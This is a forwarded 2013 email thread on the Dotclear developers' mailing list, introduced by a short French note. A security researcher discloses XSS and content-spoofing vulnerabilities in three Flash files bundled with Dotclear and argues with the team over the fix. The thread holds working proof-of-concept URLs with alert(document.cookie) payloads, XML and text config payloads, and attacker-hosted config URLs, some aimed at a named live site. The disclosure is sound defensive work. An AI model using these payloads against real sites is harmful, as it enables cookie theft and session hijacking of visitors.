Voilà la réponse à ma question de ce matin, je vous laisse le soin de gérer ça, j'suis à l'ouest point de vue question sécu là (pas encore bien compris les tenants et les aboutissants de ces failles ni leur dangerosités potentielles).
---------- Forwarded message ---------- From: MustLive <[email protected]> Date: 2013/4/12 Subject: Re: XSS and CS vulnerabilities in Dotclear To: "Dotclear (contact)" <[email protected]> ** *Hi guys!* You are welcome!. I was trying to help you yet in 14th of January :-). But it looks like you haven't received my letter (I always deal with not serious people who don't receive my letters due to their lame antispam filters, but it's their own problem and everyone must do everything to receive letters from other people, make sure that antispam filters work correctly - remove spam, but left normal letters, especially allow security related letters). This is strange, that you haven't received my letter from 14th of June, but received letter from 9th of April. Exactly because I've not received answer from my letter from 10.04, I've send new letter yesterday from another my e-mail (from gmail), which I was using for many years specially for such cases, when I see people not received my letters (with no responses or there are "returns" that filters don't allow letters from my e-mail, to bypass such lame filters). This letter I'm sending from my gmail account for sure. Because I was planning to disclose this letter this week, since almost three months passed since informing you in January, so I've reminded you three days ago. First I planned to disclose it in Tuesday evening, but because it turned out that you have fixed (and badly) only holes in SWFUpload, then I postponed it to Wednesday, then to Thursday and now to Friday evening. But I'm planning to do it at last this evening (and will write to security lists tomorrow), so you need to fix today these holes in swf already ;-). After I saw that you have fixed only holes in SWFUpload and mentioned only about it, I begun thinking that you haven't received my letter in January. And you became aware about holes SWFUpload related to Dotclear after my advisories in November and March. But in that my letter I wrote about much more holes in your engine (in all three swf-files). I'm resending my January's letter bellow. Note that in letter I've not wrote much details of holes in player_mp3.swf to make the letter more laconical. Anyway holes are similar to player_flv.swf - all CS holes are similar for both these flash applications and there are no XSS holes in mp3 player. Here are details for player_mp3.swf, so it'll be more obvious for you (xml and txt config files are similar for both these flashes). *Content Spoofing (WASC-12):* http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3 Certainly give me any URL of web site on Dotclear 2.5, so I can check your protection against attacks on swf-files. Note that your protection, on which you referenced (that you made it in version 2.5), is only for Apache and not for other web servers. As I've checked yesterday, you have used .htaccess to block access to files (including swf files). But .htaccess works only in Apache and on nginx and other web servers your engine will not be protected, and all XSS and CS holes in these three flashes can be used for attacks. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- *From:* MustLive <[email protected]> *To:* [email protected] *Sent:* Monday, January 14, 2013 12:57 AM *Subject:* XSS and Content Spoofing vulnerabilities in Dotclear *Hello developers of Dotclear!* I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear. After I've wrote about Magazeen theme for WordPress and Dotclear (which was using vulnerable TimThumb), here are new vulnerabilities related to Dotclear. I mentioned about these vulnerabilities in Magazeen theme at my site ( http://websecurity.com.ua/5120/) in 2011. You can read on English: about vulnerabilities in TimThumb and in multiples themes for different engines ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080258.html) and about vulnerabilities in Magazeen theme ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-May/080659.html). These were Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and later also Arbitrary File Uploading (WASC-31) vulnerability. And now I'm informing you about Cross-Site Scripting and Content Spoofing in core of your CMS. Your engine has three swf files (according to your site http://dev.dotclear.org/2.0/browser/inc/swf), I suppose last version Dotclear 2.4.4 too. And these file are vulnerable to XSS and CS, so your engine has these holes. File swfupload.swf it's Swfupload and it has XSS vulnerability. I've wrote about swfupload.swf in different engines, including in Dotclear, at my site (http://websecurity.com.ua/6144/) in 2012. *Cross-Site Scripting (WASC-08):* http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//<http://site/inc/swf/swfupload.swf?movieName=%22]);%7Dcatch(e)%7B%7Dif(!self.a)self.a=!alert(document.cookie);//> File player_flv.swf it's FLV Player and it has a lot of vulnerabilities. I've wrote about vulnerabilities in FLV Player in advisory at my site (http://websecurity.com.ua/5098/) in 2011. On English ( http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082321.html). *Cross-Site Scripting (WASC-08):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)> /inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)> *Content Spoofing (WASC-12):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)> /inc/swf/player_flv.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_flv.swf?configxml=http://attacker/1.xml> Here are all holes in FLV Player. *Content Spoofing (WASC-12):* http://site/player_flv_classic.swf?configxml=http://site/1.xml http://site/player_flv_maxi.swf?configxml=http://site/1.xml http://site/player_flv_classic.swf?config=http://site/1.txt http://site/player_flv_maxi.swf?config=http://site/1.txt http://site/player_flv_classic.swf?flv=http://site/film.flv&startimage=http://site/start_frame.jpg http://site/player_flv_maxi.swf?flv=http://site/film.flv&startimage=http://site/start_frame.jpg http://site/player_flv_mini.swf?flv=http://site/film.flv *XSS (WASC-08):* http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)<http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie> http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)<http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie> http://site/player_flv_maxi.swf?configxml=http://site/xss.xml File xss.xml <?xml version="1.0" encoding="UTF-8"?> <config> <param name="onclick" value="javascript:alert(document.cookie)" /> <param name="ondoubleclick" value="javascript:alert(document.cookie)" /> </config> http://site/player_flv_maxi.swf?config=http://site/xss.txt File xss.txt onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) The code will execute after a click (or double click). It's strictly social XSS. File player_flv.swf it's some mp3 player, but it has similar holes as FLV Player (if not all, then many of above-mentioned holes). *Content Spoofing (WASC-12):* http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)> /inc/swf/player_mp3.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml> Vulnerable are all versions of Dotclear - Dotclear 2.4.4 and previous versions. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- *From:* Dotclear (contact) <[email protected]> *To:* MustLive <[email protected]> *Sent:* Friday, April 12, 2013 8:22 AM *Subject:* Re: XSS and CS vulnerabilities in Dotclear Hi, Of course we will not leave any vulnerabilities in our script, as far as possible, and we would like to know exactly what are the other holes you talked about (in two other swf-files). Could you explain us what they are ? We have also looked carefully in our two different mail archive and cannot found any mail from you on last 14 january 2013. We heard about this problems in swfupload by another way. If it was the case we, as usual, thanks you in a way or another, be sure about this. Thanks a lot for helping us. Franck for DC Team 2013/4/11 MustLive <[email protected]> > ** > *Hi Franck!* > > So what about those things, which I've wrote you about yesterday? > > Are you planning to fix other holes (in two other swf-files), are you > planning to fix flash-file of SWFUpload or will just use your "non-direct > access to swf-files" approach (to prevent abuse of vulnerable swf-files > instead of fixing them), and will you give me any URL of web site on > Dotclear 2.5, so I can check it? > > Best wishes & regards, > Eugene Dokukin aka MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > ----- Original Message ----- > *From:* MustLive <[email protected]> > *To:* Dotclear (contact) <[email protected]> > *Sent:* Wednesday, April 10, 2013 9:47 PM > *Subject:* Re: XSS and CS vulnerabilities in Dotclear > > *Hello Franck!* > > Since there was no answer from you on my letter from 14.01.2013, so I > decided that you've ignored my letter. Because most of those who doesn't > answer on my letters, they just ignore and don't fix holes. And others (who > doesn't answer on my letters) fix hiddenly without thanking and without > official mentioning (at site and/or in changelog) about fixing of > vulnerabilities and those who informed about them. I haven't received any > thanks and/or official mentionings of me since 14th of January. > > Plus I've informed you about multiple vulnerabilities in three flashes, > not in just one swf-file (uploader) on which you are referencing (without > calling its name - SWFUpload, but it's clear for me, but not for others, > nor it's not count as official referencing on me and to the lists of fixed > holes, i.e. you should clearly write about fixing three holes: 2 Cross-Site > Scripting and 1 Content Spoofing vulnerabilities, not mentioning holes in > two other flash-files). From this it's clear that you've not fixed holes in > player_flv.swf and player_mp3.swf, just fixed (and badly, see below) holes > in swfupload.swf. > > You said you've fixed holes in SWFUpload, but it's not so. Before sending > my previous letter to you, I've checked your site, because almost 3 months > pasted since informing you and I planed to disclose these holes soon. And > at your site (http://dev.dotclear.org/2.0/browser/inc/swf) I've found > that none changes were made for player_flv.swf and player_mp3.swf and only > swfupload.swf was changed (at 13.03.2013) to fix the holes in it. So you've > ignored holes in first two flashes and just fixed (without answering and > thanking me) holes in third swf-file. I've downloaded it and checked it > on localhost and found that it's vulnerable to all holes, which I've > informed you about. So you didn't fix these holes either. And after that > I've wrote you my last letter. > > In which version (2.5) and how did you fix these holes, since all three > swf-files are vulnerable? Did you prevent flashes from being called > directly, as you wrote? Then give me example of any site on Dotclear 2.5, > so I can check it. I saw only sites with older versions of Dotclear which > are vulnerable to all these attacks on flashes. > > > Note also that any of the injections given in example cannot be used > with Dotclear as our swf files cannot be called directly. > > Why do you think that your swf files can be called directly. At those web > sites, which I've found in Internet, I see that they can be called > directly. So I have not seen such protection and for this reason considered > all vulnerabilities in swf files in Dotclear as real and informed you. > > Here are examples of one web site on your engine: > > *Cross-Site Scripting (WASC-08):* > > > http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//<http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?movieName=%22]);%7Dcatch(e)%7B%7Dif(!self.a)self.a=!alert(document.cookie);//> > > *Content Spoofing (WASC-12): > > * > http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E > > *Cross-Site Scripting (WASC-08):* > > http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E > > And similar attacks on other flash-files, about which I've informed you - > on XSS and CS vulnerabilities in player_flv.swf and player_mp3.swf. > > Best wishes & regards, > Eugene Dokukin aka MustLive > Administrator of Websecurity web site > http://websecurity.com.ua >
_______________________________________________ Dev mailing list - [email protected] - http://ml.dotclear.org/listinfo/dev
